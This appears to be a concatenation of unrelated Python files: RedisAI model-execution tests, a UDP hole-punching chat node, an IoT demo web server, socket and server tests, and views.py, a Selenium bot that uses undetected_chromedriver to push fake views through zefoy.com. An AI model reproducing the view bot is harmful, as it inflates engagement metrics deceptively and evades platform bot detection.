'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META', 'VALUES', '|>',
'AI.MODELEXECUTE', model_name,
'INPUTS', 2, transaction_tensor_keyname, reference_tensor_keyname,
'OUTPUTS', 1, result_tensor_keyname, '|>',
'AI.TENSORGET', result_tensor_keyname, 'META', 'VALUES',
)
env.assertEqual(5, len(ret))
env.assertEqual([b'OK', b'OK'], ret[:2])
env.assertEqual([b'dtype', b'FLOAT', b'shape', [1, 2]], ret[2][:4])
env.assertEqual(b'OK', ret[3])
env.assertEqual([b'dtype', b'FLOAT', b'shape', [1, 2]], ret[4][:4])
for _, dtype, _, shape, _, values in [ret[2], ret[4]]:
# Assert that resulting classification is within [0,1]
env.assertEqual(True, 0 <= float(values[0]) <= 1)
env.assertEqual(True, 0 <= float(values[1]) <= 1)
info = con.execute_command('AI.INFO', model_name)
financialNetRunInfo = info_to_dict(info)
env.assertEqual(model_name, financialNetRunInfo['key'])
env.assertEqual('MODEL', financialNetRunInfo['type'])
env.assertEqual('TF', financialNetRunInfo['backend'])
# Commenting due to: 'ascii' codec can't encode character '\u274c' in position 8: ordinal not in range(128)
# env.assertEqual(DEVICE, financialNetRunInfo['device'])
env.assertTrue(financialNetRunInfo['duration'] > 0)
env.assertEqual(2*MAX_TRANSACTIONS*10, financialNetRunInfo['samples'])
env.assertEqual(2*MAX_TRANSACTIONS*10, financialNetRunInfo['calls'])
env.assertEqual(0, financialNetRunInfo['errors'])
con.execute_command('AI.INFO', model_name, 'RESETSTAT')
info = con.execute_command('AI.INFO', model_name)
financialNetRunInfo = info_to_dict(info)
env.assertEqual(model_name, financialNetRunInfo['key'])
env.assertEqual('MODEL', financialNetRunInfo['type'])
env.assertEqual('TF', financialNetRunInfo['backend'])
# Commenting due to: 'ascii' codec can't encode character '\u274c' in position 8: ordinal not in range(128)
# env.assertEqual(DEVICE, financialNetRunInfo['device'])
env.assertEqual(0, financialNetRunInfo['duration'])
env.assertEqual(0, financialNetRunInfo['samples'])
env.assertEqual(0, financialNetRunInfo['calls'])
env.assertEqual(0, financialNetRunInfo['errors'])
def test_dagexecute_modelexecute_multidevice_resnet(env):
if (not TEST_TF or not TEST_PT):
return
con = get_connection(env, '{1}')
model_name_0 = 'imagenet_model1:{1}'
model_name_1 = 'imagenet_model2:{1}'
script_name = 'imagenet_script:{1}'
image_key = 'image:{1}'
temp_key1 = 'temp_key1:{1}'
temp_key2_0 = 'temp_key2_0'
temp_key2_1 = 'temp_key2_1'
class_key_0 = 'output0:{1}'
class_key_1 = 'output1:{1}'
inputvar = 'images'
outputvar = 'output'
model_pb, script, labels, img = load_resnet_test_data()
device_0 = 'CPU:1'
device_1 = DEVICE
ret = con.execute_command('AI.MODELSTORE', model_name_0, 'TF', device_0,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELSTORE', model_name_1, 'TF', device_1,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.SCRIPTSTORE', script_name, device_0, 'ENTRY_POINTS', 4, 'pre_process_3ch', 'pre_process_4ch', 'post_process', 'ensemble', 'SOURCE', script)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
check_error_message(env, con, "INPUT key cannot be found in DAG",
'AI.DAGEXECUTE', 'ROUTING', image_key, '|>', 'AI.SCRIPTEXECUTE', script_name, 'pre_process_3ch',
'INPUTS', 1, image_key, 'OUTPUTS', 1, temp_key1)
check_error_message(env, con, "INPUT key cannot be found in DAG",
'AI.DAGEXECUTE', 'ROUTING', image_key, '|>', 'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, image_key, 'OUTPUTS', 1, temp_key1)
ret = con.execute_command('AI.DAGEXECUTE',
'ROUTING', '{1}','|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),'|>',
'AI.SCRIPTEXECUTE', script_name, 'wrong_fn',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1)
env.assertEqual(b'OK', ret[0])
env.assertEqual(type(ret[1]), redis.exceptions.ResponseError)
env.assertEqual("Function does not exist: wrong_fn", ret[1].__str__())
check_error_message(env, con, "Number of keys given as INPUTS here does not match model definition",
'AI.DAGEXECUTE', 'ROUTING', '{1}',
'|>', 'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1, '|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 2, temp_key1, temp_key1,
'OUTPUTS', 1, temp_key2_0)
ret = con.execute_command(
'AI.DAGEXECUTE',
'PERSIST', '2', class_key_0, class_key_1, '|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name, 'post_process',
'INPUTS', 1, temp_key2_0,
'OUTPUTS', 1, class_key_0,
'|>',
'AI.SCRIPTEXECUTE', script_name, 'post_process',
'INPUTS', 1, temp_key2_1,
'OUTPUTS', 1, class_key_1
)
env.assertEqual([b'OK', b'OK', b'OK', b'OK', b'OK', b'OK'], ret)
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.TENSORGET', class_key_0, 'VALUES' )
# tf model has 100 classes [0,999]
env.assertEqual(ret[0]>=0 and ret[0]<1001, True)
ret = con.execute_command('AI.TENSORGET', class_key_1, 'VALUES' )
env.assertEqual(ret[0]>=0 and ret[0]<1001, True)
def test_dagexecute_modelexecute_multidevice_resnet_ensemble_alias(env):
if (not TEST_TF or not TEST_PT):
return
con = get_connection(env, '{1}')
model_name_0 = 'imagenet_model1:{1}'
model_name_1 = 'imagenet_model2:{1}'
script_name_0 = 'imagenet_script1:{1}'
script_name_1 = 'imagenet_script2:{1}'
inputvar = 'images'
outputvar = 'output'
image_key = 'image:{1}'
temp_key1 = 'temp_key1:{1}'
temp_key2_0 = 'temp_key2_0'
temp_key2_1 = 'temp_key2_1'
class_key_0 = 'output0:{1}'
class_key_1 = 'output1:{1}'
model_pb, script, labels, img = load_resnet_test_data()
device_0 = 'CPU:1'
device_1 = DEVICE
ret = con.execute_command('AI.MODELSTORE', model_name_0, 'TF', device_0,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELSTORE', model_name_1, 'TF', device_1,
'INPUTS', 1, inputvar,
'OUTPUTS', 1, outputvar,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.SCRIPTSTORE', script_name_0, device_0, 'ENTRY_POINTS', 4, 'pre_process_3ch', 'pre_process_4ch', 'post_process', 'ensemble', 'SOURCE', script)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.SCRIPTSTORE', script_name_1, device_1, 'ENTRY_POINTS', 4, 'pre_process_3ch', 'pre_process_4ch', 'post_process', 'ensemble', 'SOURCE', script)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
# Cannot persist class_key_1
check_error_message(env, con, "PERSIST key cannot be found in DAG",
'AI.DAGEXECUTE',
'PERSIST', '2', class_key_0, class_key_1, '|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name_1, 'ensemble',
'INPUTS', 2, temp_key2_0, temp_key2_1,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'post_process',
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, class_key_0)
# temp_key1 + '_foo' is an input for a DAG op which is not an output of a previous op.
check_error_message(env, con, "INPUT key cannot be found in DAG",
'AI.DAGEXECUTE',
'PERSIST', '1', class_key_0,
'|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, temp_key1 + '_foo',
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name_1, 'ensemble',
'INPUTS', 2, temp_key2_0, temp_key2_1,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'post_process',
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, class_key_0)
# The 'ensamble' function in script_name_0 expect to receive 2 inputs (not 1)
ret = con.execute_command(
'AI.DAGEXECUTE',
'PERSIST', '1', class_key_0, '|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'ensemble',
'INPUTS', 1, temp_key2_0,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'post_process',
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, class_key_0)
env.assertEqual(b'OK', ret[0])
env.assertEqual(b'OK', ret[1])
env.assertEqual(b'OK', ret[2])
env.assertEqual(b'OK', ret[3])
env.assertEqual(b'NA', ret[5])
env.assertEqual(type(ret[4]), redis.exceptions.ResponseError)
env.assertTrue("list index out of range" in ret[4].__str__())
ret = con.execute_command(
'AI.DAGEXECUTE',
'PERSIST', '1', class_key_0,
'|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'ensemble',
'INPUTS', 2, temp_key2_0, temp_key2_1,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'post_process',
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, class_key_0,
)
env.assertEqual([b'OK', b'OK', b'OK', b'OK', b'OK', b'OK'], ret)
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.TENSORGET', class_key_0, 'VALUES' )
# tf model has 100 classes [0,999]
env.assertEqual(ret[0]>=0 and ret[0]<1001, True)
|
views.py
|
import fade
import undetected_chromedriver as uc
from time import sleep
from selenium.webdriver.common.by import By
import os
import io
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import threading
from datetime import datetime
from selenium import webdriver
def time():
global current_time
while True:
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
sleep(0.5)
def main():
global driver
global wait
try:
# selecting views
driver.refresh()
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[1]/div[3]/div/div[4]/div/button'))).click()
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[5]/div/form/div/input'))).clear() #clearing input
except:
try:
ck = wait.until(EC.element_to_be_clickable((By.XPATH, "/html/body/div[4]/div[1]/div[3]/div/div[4]/div/p/small")))
if ck.text == "soon will be update":
print("[x | "+str(current_time)+"] Unavailable => Views", end="\r")
sleep(999)
captcha_ai()
else:
driver.refresh()
main()
except:
pass
print("[x | "+str(current_time)+"] HUH? ERROR")
sleep(1)
driver.refresh()
sleep(5)
captcha_ai()
try:
print(fade.water('[* | '+str(current_time)+'] Sending URL'), end="\r")
sleep(0.1)
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[5]/div/form/div/input'))).send_keys(url)
sleep(0.1)
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[5]/div/form/div/div/button'))).click() # searching
try:
tv = WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, "/html/body/div[4]/div[5]/div/div/div[1]/div/form/button"))) #get views num on send button
print(fade.brazil("[- | "+str(current_time)+"] Total views: " + tv.text), end="\r")
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[5]/div/div/div[1]/div/form/button'))).click() # send views
except:
sleep(2)
lmt = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, "h4")))
timer_message = lmt.text
minutes = int(timer_message.split()[2])
seconds = int(timer_message.split()[4])
time_to_wait = (minutes * 60 + seconds)
print("[* | "+str(current_time)+"] Waiting => ", time_to_wait, 'seconds')
sleep(time_to_wait)
main()
main()
except:
try:
driver.refresh()
sleep(1)
driver.find_element(By.XPATH, '/html/body/div[4]/div[1]/div[3]/div/div[4]/div/button').click()
main()
except:
captcha_ai()
def captcha_ai():
driver.set_window_position(0, 0)
print('[*] Solve Captcha')
sleep(5)
try:
driver.find_element(By.XPATH, '/html/body/div[4]/div[1]/div[3]/div/div[4]/div/button').click()
driver.refresh()
print(fade.random("[* | " + str(current_time) + "] Boyzz, we are in!"), end="\r")
driver.set_window_position(-10000, 0)
main()
except:
captcha_ai()
if __name__ == "__main__":
print(fade.purplepink(r'''
._______.______ ._______._______ .___ .___ ._______ ___ .________ TM
:_ ____/: __ \ : .____/: .____/ | |___ : __|: .____/.___ | || ___/
| _/ | \____|| : _/\ | : _/\ | | || : || : _/\ : | /\| ||___ \
| | | : \ | / \| / \ | : || || / \| |/ : || /
|_. | | |___\|_.: __/|_.: __/ \ || ||_.: __/| / ||__:___/
:/ |___| :/ :/ \____/ |___| :/ |______/|___| :
: :
:
'''))
#start = input('[*] Type any key to start: ')
url = input('[*] Url: ')
opts = webdriver.ChromeOptions()
driver = uc.Chrome(options=opts)
driver.get('https://zefoy.com')
wait = WebDriverWait(driver, 5)
a = threading.Thread(target=time)
b = threading.Thread(target=captcha_ai)
a.start()
b.start()
|
Nodes.py
|
'''
Created on Jul 25, 2017
@author: Steven Proctor
grab +port grab +port
spit packets
recieve
'''
import socket
import time
from threading import Thread
class Node(object):
'''
classdocs
'''
def __init__(self, addr, ports,female):
self.buffer = []
self.portlink(addr,ports,female)
def send(self, message):
try:
self.outbound.sendto(message, self.toaddr)
except:
time.sleep(0.01)
self.send(message)
def portlink(self,addr,ports,start):
if start:
while True:
s= socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto("t", (socket.gethostbyname(socket.gethostname()), 5555))
if s.getsockname()[1] in ports:
sock = s
break
else:
s.close()
time.sleep(0.01)
for p in ports:
sock.sendto("t",(addr,p))
time.sleep(0.01)
addr2bind = sock.getsockname()
sock.close()
flower = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
flower.bind(addr2bind)
print "waiting"
data, address = flower.recvfrom(64)
print str(address)
self.toaddr = address
self.fromaddr = (addr,int(data))
flower.close()
time.sleep(5)
temp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
temp.sendto("t", self.fromaddr)
tempaddr = temp.getsockname()
temp.close()
self.inbound = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.inbound.bind(tempaddr)
self.outbound = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.outbound.bind(addr2bind)
self.outbound.connect(self.toaddr)
self.outbound.sendto(str(tempaddr[1]),self.toaddr)
self.open = True
t = Thread(target = self.__listen__)
t.start()
else:
self.outbound = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.outbound.sendto("t", (socket.gethostbyname(socket.gethostname()), 5555))
time.sleep(0.02*len(ports))
while True:
s= socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto("t", (socket.gethostbyname(socket.gethostname()), 5555))
if s.getsockname()[1] in ports:
sock = s
break
else:
s.close()
time.sleep(0.01)
for p in ports:
sock.sendto(str(self.outbound.getsockname()[1]),(addr,p))
time.sleep(0.01)
addr2bind = sock.getsockname()
sock.close()
self.inbound = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.inbound.bind(addr2bind)
print "waiting"
data, address = self.inbound.recvfrom(64)
print "complete"
self.fromaddr = address
self.toaddr = (addr,int(data))
self.outbound.sendto("check",self.toaddr)
self.open = True
t = Thread(target = self.__listen__)
t.start()
def __listen__(self):
while self.open:
data, address = self.inbound.recvfrom(64)
if address == self.fromaddr:
self.buffer.append(data)
ports = range(30000,65000,300)
node = Node("73.172.209.102", ports, False)
while(True):
node.send(str(raw_input("")))
if len(node.buffer) != 0:
print node.buffer[len(node.buffer)-1]
|
sim-webapp.py
|
#!/usr/bin/env python
#
# Pelion Virtual Demo
# (C) COPYRIGHT 2021 Pelion Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
"""Pelion virtual demo bootstrap."""
import logging
import os
import subprocess
import threading
import posix_ipc
import asyncio
import contextlib
import tornado.escape
import tornado.ioloop
import tornado.options
import tornado.web
import tornado.websocket
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
config = {}
MQUEUE_CMD = "/mqueue-cmd"
MQUEUE_RESP = "/mqueue-resp"
qd_cmd = posix_ipc.MessageQueue(
name=MQUEUE_CMD, flags=posix_ipc.O_CREAT, max_messages=10, max_message_size=256)
qd_resp = posix_ipc.MessageQueue(
name=MQUEUE_RESP, flags=posix_ipc.O_CREAT, max_messages=10, max_message_size=256)
class Application(tornado.web.Application):
def __init__(self):
handlers = [(r"/", MainHandler), (r"/comsock", ComSocketHandler)]
settings = dict(
cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
xsrf_cookies=True,
)
# disable web logging access
logging.getLogger('tornado.access').disabled = True
# initialize mqueue handler
MqueuHandler()
super().__init__(handlers, **settings)
class MqueuHandler():
def __init__(self):
mqueue_listen_thread = threading.Thread(
target=self.mqueue_resp_listen, daemon=True)
mqueue_listen_thread.start()
def mqueue_resp_listen(name):
# logging.info("listening on (qd_resp)...")
asyncio.set_event_loop(asyncio.new_event_loop())
while True:
s, _ = qd_resp.receive()
s = s.decode()
# logging.info("got (qd_resp) msg: '%s'", s)
ComSocketHandler.send_update(s)
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render("index.html", sensor_type=config['sensor_type'])
class ComSocketHandler(tornado.websocket.WebSocketHandler):
waiters = set()
def get_compression_options(self):
# Non-None enables compression with default options.
return {}
def open(self):
# logging.info("open(self)")
ComSocketHandler.waiters.add(self)
def on_close(self):
# logging.info("on_close(self)")
ComSocketHandler.waiters.remove(self)
@classmethod
def send_update(cls, message):
for waiter in cls.waiters:
try:
waiter.write_message(message)
except:
logging.error("Error sending message", exc_info=True)
# logging.info("sent (ws) msg to %d waiters", len(cls.waiters))
def on_message(self, message):
# logging.info("got (ws) msg: %r", message)
# add null termination expected from C backend
cmd = message.encode('ascii') + b'\x00'
qd_cmd.send(cmd)
# logging.info("sent (qd_cmd) msg: '%s'", cmd)
def gencerts():
# invoke Pelion 'dev_init.py' to create certs
subprocess.Popen(['./dev_init.py', 'with-credentials', '-a', config["api_key"],
'-u', config['cloud_url']],
cwd='/build/mbed-cloud-client-example/utils').wait()
def build():
# delete the last instance of the app so that we don't automatically
# execute the old app if the new build fails
with contextlib.suppress(FileNotFoundError):
os.remove(
'/build/mbed-cloud-client-example/__x86_x64_NativeLinux_mbedtls/Debug/mbedCloudClientExample.elf')
# spawn process to build pelion-client
subprocess.Popen(['make', 'mbedCloudClientExample.elf'],
cwd='/build/mbed-cloud-client-example/__x86_x64_NativeLinux_mbedtls').wait()
def _main():
tornado.options.parse_command_line()
# check if CLOUD_SDK_API_KEY env is configured
try:
config["api_key"] = os.environ['CLOUD_SDK_API_KEY']
except KeyError as e:
logging.error(
'Missing CLOUD_SDK_API_KEY environmental key !'
)
exit(1)
# check if CLOUD_URL env is configured (default to prod.)
config['cloud_url'] = os.getenv('CLOUD_URL', 'https://api.us-east-1.mbedcloud.com')
# check if SENSOR env is configured
config['sensor_type'] = os.getenv('SENSOR', 'vibration')
if config['sensor_type'] != "vibration" and config['sensor_type'] != "temperature" and config['sensor_type'] != "counter":
logging.error(
"unknown sensor type configured, please use either 'vibration', 'temperature' or 'counter'\n"
)
exit(1)
# check if we need to generate certs
if not os.path.isfile('certexists'):
# generate dev and fw certs
gencerts()
# raise flag so that we don't regenerate on next run
open('certexists', 'w').close()
# check if we need to build app
if not os.path.isfile('firstrun'):
# build application
build()
# raise flag so that we don't rebuild on next run
open('firstrun', 'w').close()
# launch pelion client in a separate process
subprocess.Popen(['./mbedCloudClientExample.elf'],
cwd='/build/mbed-cloud-client-example/__x86_x64_NativeLinux_mbedtls/Debug/')
# launch web app
app = Application()
app.listen(options.port)
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
_main()
|
socketTest.py
|
from socket import *
from time import sleep
import threading
def recvData():
udpRecvSocket = socket(AF_INET,SOCK_DGRAM)
myRecvPort = 48969
bindAddr = ('',myRecvPort)
try:
udpRecvSocket.bind(bindAddr)
except OSError:
myRecvPort = int(input("input a port:"))
bindAddr = ('',myRecvPort)
udpRecvSocket.bind(bindAddr)
myIpAddr = gethostbyname(getfqdn(gethostname()))#gethostname()得到主机名 gethostbyname()得到主机IP
print("local ip:[{}],local port [{}]".format(myIpAddr,myRecvPort))
while True:
try:
recvData = udpRecvSocket.recvfrom(1024)
print("receive data is :{}".format(recvData))
except error as e:
print(e)
def sendData():
sleep(10)
udpSendSocket = socket(AF_INET,SOCK_DGRAM)
sendIpAddr = input("target ip:")
sendPort = int(input("target port:"))
sendAddr = (sendIpAddr,sendPort)
while True:
sendData = input("please input the data to sended")
udpSendSocket.sendto(sendData.encode(),sendAddr)
def main():
t1 = threading.Thread(target = recvData)
t2 = threading.Thread(target = sendData)
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
main()
|
runtests.py
|
#!/usr/bin/env python
import sys
import contextlib
import traceback
import unittest
import time
import os
import subprocess
import errno
import signal
import urllib2
import threading
import Queue
PREFIX = os.environ.get("AFDT_TEST_PREFIX", "").split()
class SubprocessTestCase(unittest.TestCase):
def setUp(self):
def sigchld_handler(signum, frame):
while True:
status = os.waitpid(-1, os.WNOHANG | os.WUNTRACED | os.WCONTINUED)
if status == (0, 0):
break
if os.WIFSTOPPED(status[1]) or os.WIFCONTINUED(status[1]):
# Ignore SIGCHLDs due to stopping and starting a child
continue
raise Exception("child died unexpectedly: %r" % (status,))
signal.signal(signal.SIGCHLD, sigchld_handler)
def killChildren(self, children):
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
for proc in children:
try:
if proc is not None:
os.kill(proc.pid, signal.SIGTERM)
except OSError, err:
if err.errno != errno.ESRCH:
traceback.print_exc()
class EvhttpTest(SubprocessTestCase):
prod_port = 8080
port0 = 9090
port1 = 9191
# Number of requests to send to the production port to verify
# the set of servers that are listening on it.
# This is nondeterministic, but we take our chances.
iterations = 0x10000
def setUp(self):
SubprocessTestCase.setUp(self)
def startserver(port):
return subprocess.Popen(PREFIX +
["./server", "-a", str(port), "-s", "p" + str(port)])
self.proc0 = None
self.proc1 = None
self.proc0 = startserver(self.port0)
self.proc1 = startserver(self.port1)
# TODO(dreiss): Check statuses so we can stop sleeping early
time.sleep(1.0/2)
status = os.waitpid(-1, os.WNOHANG)
assert status == (0, 0)
def tearDown(self):
self.killChildren([self.proc0, self.proc1])
def testServers(self):
def openurl(port, path):
with contextlib.closing(urllib2.urlopen(
"http://localhost:%d/%s" % (port, path))) as handle:
return handle.read()
def checkret(port, path, content):
self.assertEqual(openurl(port, path), content)
def putret(port, path, q):
q.put(openurl(port, path))
def checkset(port, path, expect):
results = set()
iter = 0
while iter < self.iterations:
results.add(openurl(port, path))
self.assert_(results <= expect)
if results == expect:
break
iter += 1
self.assertNotEqual(iter, self.iterations)
# Check basic status responses
checkret(self.port0, "status", "p%d" % self.port0)
checkret(self.port1, "status", "p%d" % self.port1)
# Have one server bind to production
checkret(self.port0, "bind_prod", "bind")
# Verify production
checkret(self.prod_port, "status", "p%d" % self.port0)
# Rebind detection
checkret(self.port0, "bind_prod", "already_open")
# Close production
checkret(self.port0, "close_prod", "closed")
# Verify close production
checkret(self.port0, "close_prod", "no_prod")
# Repeat with the other server
checkret(self.port1, "bind_prod", "bind")
checkret(self.prod_port, "status", "p%d" % self.port1)
checkret(self.port1, "bind_prod", "already_open")
checkret(self.port1, "close_prod", "closed")
checkret(self.port1, "close_prod", "no_prod")
# Have one server bind to production
checkret(self.port0, "bind_prod", "bind")
# Verify production
checkret(self.prod_port, "status", "p%d" % self.port0)
# Have the other server grab the socket
checkret(self.port1, "bind_prod", "afdt")
# Verify that both are listening
checkset(self.prod_port, "status",
set(["p%d" % port for port in [self.port0, self.port1]]))
# Close the socket on the original server
checkret(self.port0, "close_prod", "closed")
# Verify that only the second is listening
checkset(self.prod_port, "status",
set(["p%d" % port for port in [self.port1]]))
# Have the first server get the socket back
checkret(self.port0, "bind_prod", "afdt")
# Verify that both are listening
checkset(self.prod_port, "status",
set(["p%d" % port for port in [self.port0, self.port1]]))
# Close the socket on the second server
checkret(self.port1, "close_prod", "closed")
# Verify that only the first is listening
checkset(self.prod_port, "status",
set(["p%d" % port for port in [self.port0]]))
# Close the socket on the first server
checkret(self.port0, "close_prod", "closed")
# Repeat the simple case with the second server
checkret(self.port1, "bind_prod", "bind")
checkret(self.prod_port, "status", "p%d" % self.port1)
checkret(self.port1, "bind_prod", "already_open")
checkret(self.port1, "close_prod", "closed")
checkret(self.port1, "close_prod", "no_prod")
# Have the first server bind to production
checkret(self.port0, "bind_prod", "bind")
# Verify production
checkret(self.prod_port, "status", "p%d" % self.port0)
# Suspend that process
self.proc0.send_signal(signal.SIGSTOP)
# Use a background thread to have the second server grab the socket
q = Queue.Queue()
t = threading.Thread(target=putret, args=(self.port1, "bind_prod", q))
t.start()
# After a half second, we should still be waiting
time.sleep(0.5)
self.assert_(q.empty())
# The second server should still be able to respond to requests
checkret(self.port1, "status", "p%d" % self.port1)
# Let the first server wake up and transfer the socket
self.proc0.send_signal(signal.SIGCONT)
# The second server should receive the socket quickly
self.assertEqual(q.get(timeout=1.0/16), "afdt")
t.join(1.0/16)
self.assertFalse(t.isAlive())
# Close the socket on the first server
checkret(self.port0, "close_prod", "closed")
# Verify that the second is listening
checkret(self.prod_port, "status", "p%d" % self.port1)
# Remove the signal handler
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
# Shut both servers down
checkret(self.port0, "shutdown", "shutting_down")
checkret(self.port1, "shutdown", "shutting_down")
# Make sure they both go down in a reasonable time
def sigalrm_handler(signum, frame):
raise Exception("waitpid timed out")
signal.signal(signal.SIGALRM, sigalrm_handler)
signal.alarm(1)
self.assertEqual(self.proc0.wait(), 0)
self.assertEqual(self.proc1.wait(), 0)
self.proc0 = None
self.proc1 = None
signal.alarm(0)
signal.signal(signal.SIGALRM, signal.SIG_DFL)
class CatterTest(SubprocessTestCase):
svport = 9090
client = "catter"
def setUp(self):
SubprocessTestCase.setUp(self)
def tearDown(self):
self.killChildren([self.svproc, self.clproc])
def testCatter(self):
self.svproc = None
self.clproc = None
self.svproc = subprocess.Popen(PREFIX +
["./catter", "-s"], stdout=subprocess.PIPE)
time.sleep(1.0/4)
self.clproc = subprocess.Popen(PREFIX +
["./" + self.client], stdin=subprocess.PIPE)
